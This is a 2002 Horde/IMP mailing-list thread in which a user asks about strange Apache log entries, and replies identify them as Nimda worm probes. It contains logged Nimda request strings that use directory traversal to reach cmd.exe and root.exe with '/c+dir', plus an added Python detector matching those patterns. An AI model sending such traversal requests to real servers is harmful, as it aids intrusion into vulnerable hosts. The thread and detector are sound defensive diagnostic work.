R: [imp] Apache errors regarding IMP

Devin Drown drown@banzai.org
Mon Oct 21 14:33:10 2002


The question I have is: is "202.64.220.x" the IP of your machine? Because if it
is, then these Nimda requests are coming from it and you should really patch
and clean your machine.

-Devin

Quoting Giovanni Riganti <griganti@eco.uninsubria.it>:

> Hi,
> 
> It is the usual procedure of Nimda, which tries to infect your machine.
> Don't worry, Nimda infects only IIS.
> 
> Look at http://www.cert.org/advisories/CA-2001-26.html.
> Or
> 
> Bye,
> Gio
> 
> 
> 
> 
> :> -----Original Message-----
> :> From: imp-bounces@lists.horde.org [mailto:imp-bounces@lists.horde.org] On
> :> behalf of Frederick Ho
> :> Sent: Monday, 21 October 2002 15:02
> :> To: imp@lists.horde.org
> :> Subject: [imp] Apache errors regarding IMP
> :>
> :>
> :> Hi,
> :>   I am currently running Horde 2.1, IMP 3.1 in RedHat 7.2 with Apache
> :> 1.3.23 and logged some weird messages in the Apache logs.
> :>
> :>   Has anyone seen the following errors in the Linux
> :> httpd/access_log, httpd/error_log regarding the Horde/IMP errors?
> :>
> :> > httpd/access_log
> :> 202.64.220.x - - [20/Oct/2002:21:16:28 +0800] "GET
> :> /horde/imp/view.php?thismailbox=INBOX&index=1941&id=2&actionID=11
> :> 3&mime=9d1caf7ffd290b8e7ebeecded7496350 HTTP/1.1" 200 5894947
> :> 202.64.220.x - - [20/Oct/2002:21:17:09 +0800] "GET
> :> /scripts/root.exe?/c+dir HTTP/1.1" 404 295
> :> 202.64.220.x - - [20/Oct/2002:21:17:09 +0800] "GET
> :> /MSADC/root.exe?/c+dir HTTP/1.1" 404 293
> :> 202.64.220.x - - [20/Oct/2002:21:17:10 +0800] "GET
> :> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.1" 404 303
> :> 202.64.220.x - - [20/Oct/2002:21:17:10 +0800] "GET
> :> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.1" 404 303
> :> 202.64.220.x - - [20/Oct/2002:21:17:13 +0800] "GET
> :> /scripts/..%5C../winnt/system32/cmd.exe?/c+dir HTTP/1.1" 404 315
> :> 202.64.220.x - - [20/Oct/2002:21:17:13 +0800] "GET
> :> /_vti_bin/..%5C../..%5C../..%5C../winnt/system32/cmd.exe?/c+dir
> :> HTTP/1.1" 404 328
> :> 202.64.220.x - - [20/Oct/2002:21:17:14 +0800] "GET
> :> /_mem_bin/..%5C../..%5C../..%5C../winnt/system32/cmd.exe?/c+dir
> :> HTTP/1.1" 404 328
> :>
> :> > httpd/error_log
> :> [Sun Oct 20 04:18:46 2002] [error] [client 202.64.220.x] File
> :> does not exist: /var/www/html/horde/imp/scripts/root.exe
> :> [Sun Oct 20 04:18:46 2002] [error] [client 202.64.220.x] File
> :> does not exist: /var/www/html/horde/imp/MSADC/root.exe
> :> [Sun Oct 20 04:18:47 2002] [error] [client 202.64.220.x] File
> :> does not exist: /var/www/html/horde/imp/c/winnt/system32/cmd.exe
> :> [Sun Oct 20 04:18:47 2002] [error] [client 202.64.220.x] File
> :> does not exist: /var/www/html/horde/imp/d/winnt/system32/cmd.exe
> :> [Sun Oct 20 04:18:47 2002] [error] [client 202.64.220.x] File
> :> does not exist:
> :> /var/www/html/horde/imp/scripts/..\../winnt/system32/cmd.exe
> :> [Sun Oct 20 04:18:50 2002] [error] [client 202.64.220.x] File
> :> does not exist:
> :> /var/www/html/horde/imp/_vti_bin/..\../..\../..\../winnt/system32/cmd.exe
> :> [Sun Oct 20 04:18:52 2002] [error] [client 202.64.220.x] File
> :> does not exist:
> :> /var/www/html/horde/imp/_mem_bin/..\../..\../..\../winnt/system32/cmd.exe
> :> [Sun Oct 20 04:18:52 2002] [error] [client 202.64.220.x] File
> :> does not exist:
> :> /var/www/html/horde/imp/msadc/..\../..\../..\/..Á^\../..Á^\../..Á
> :> ^\../winnt/system32/cmd.exe
> :> [Sun Oct 20 04:18:52 2002] [error] [client 202.64.220.x] File
> :> does not exist:
> :> /var/www/html/horde/imp/scripts/..Á^\../winnt/system32/cmd.exe
> :>
> :> Why am I getting these errors? I used both Netscape 7 and IE 6
> :> browsers on Win2K to access the IMP mail server running on Linux.
> :> I also used Apache 2.0.4 on Redhat 8 on my development system
> :> and it showed the same weird messages in the logs.
> :>
> :> Anyone care to comment? Why did IMP try to access winnt stuff?
> :> Am I under attack? My virus scan showed nothing.
> :>
> :> Regards,
> :> Fred
> :>
> :>
> :>
> :>
> :> --
> :> IMP mailing list
> :> Frequently Asked Questions: http://horde.org/faq/
> :> To unsubscribe, mail: imp-unsubscribe@lists.horde.org
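
Added example, not part of the original thread: a Python check that applies Devin's question to an access log, separating clients that send only the root.exe/cmd.exe requests from clients that also make successful ordinary requests (a real user's machine). The sample log, the 192.0.2.x addresses, the field names and the verdict labels are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample (Apache common log format), modelled on the quoted lines;
# the 192.0.2.x addresses are documentation placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [20/Oct/2002:21:16:28 +0800] "GET /horde/imp/view.php?thismailbox=INBOX&index=1 HTTP/1.1" 200 5894
192.0.2.10 - - [20/Oct/2002:21:17:09 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.1" 404 295
192.0.2.10 - - [20/Oct/2002:21:17:13 +0800] "GET /scripts/..%5C../winnt/system32/cmd.exe?/c+dir HTTP/1.1" 404 315
192.0.2.77 - - [20/Oct/2002:21:20:01 +0800] "GET /horde/imp/view.php?thismailbox=INBOX&index=2 HTTP/1.1" 200 8120
192.0.2.99 - - [20/Oct/2002:21:25:40 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.1" 404 293
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) ')
# Request shape seen in the thread: root.exe or cmd.exe called with "?/c+<command>".
PROBE = re.compile(r'/(?:root|cmd)\.exe\?/c\+', re.IGNORECASE)

def classify_clients(log_text):
    """Return {ip: {"probes", "non_404", "app_ok", "verdict"}} for each client."""
    stats = defaultdict(lambda: {"probes": 0, "non_404": 0, "app_ok": 0})
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in common log format
        ip, target, status = m.group(1), m.group(2), int(m.group(3))
        s = stats[ip]
        if PROBE.search(target):
            s["probes"] += 1
            if status != 404:
                s["non_404"] += 1  # a probe the server did not 404 needs a closer look
        elif 200 <= status < 300:
            s["app_ok"] += 1       # ordinary successful request
    for s in stats.values():
        if s["probes"] and s["app_ok"]:
            s["verdict"] = "user-host-probing"  # a real user's machine is scanning
        elif s["probes"]:
            s["verdict"] = "scanner"            # probes only, no normal use
        else:
            s["verdict"] = "clean"
    return dict(stats)

if __name__ == "__main__":
    for ip, s in classify_clients(SAMPLE_LOG).items():
        print(ip, s)
```

A "user-host-probing" verdict is the situation Devin describes: the address that reads mail through IMP is also the source of the probes, so that workstation is the one to patch and clean.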